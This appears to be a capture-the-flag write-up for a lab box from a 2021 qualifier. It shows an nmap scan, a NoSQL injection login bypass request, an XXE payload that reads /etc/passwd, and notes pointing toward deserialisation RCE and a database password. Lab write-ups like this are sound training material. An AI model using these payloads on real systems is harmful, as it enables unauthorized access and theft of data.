$ nmap -p- --min-rate 5000 10.129.96.160
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 07:30 EST
Nmap scan report for 10.129.96.160
Host is up (0.013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
NoSQL Login Bypass
This was a UHC qualifier box in 2021.
There was a login functionality there. I tested some SQL Injection but to no avail. Because this was a UHC box, this was probably the way in. I tested some NoSQL injection and it worked in bypassing it!
POST /login HTTP/1.1Host:10.129.96.160:5000User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/jsonContent-Length:56Origin:http://10.129.96.160:5000Connection:closeReferer:http://10.129.96.160:5000/loginUpgrade-Insecure-Requests:1{"user":"admin","password": {"$ne":"admin"}}
XXE Injection
All of the functions do nothing much, except for the Upload one. When trying to upload something, I get this error:
Invalid XML Example: Example DescriptionExample Markdown
This indidates that we have to upload a malicious XML file to achieve XXE injection for our reverse shell. Taking a look at the POST request in Burpsuite reveals that we need this format:
I headed to PayloadAllTheThings to try some XXE injection payloads, and it worked rather well:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<post>
<title>mypost</title>
<description>testfile</description>
<markdown>&file;</markdown>
</post>
Then we can save this into a file and upload it. The output would be printed in the markdown area:
Earlier while testing my NoSQL injections, I did run across an error like this:
So the source code files are in /opt/blog. A bit more testing revealed the main file to be server.js.
First thing I notice is that there is unserialisation going on. This web application must be vulnerable to RCE through Deserialisation. This article showed up when I searched for this exploit:
Earlier we used NoSQL injection to access this, and perhaps we can find the actual credentials for the admin user (so that I can check sudo privleges). Some DBs and collections can be found here.
I could find a password from the users collections.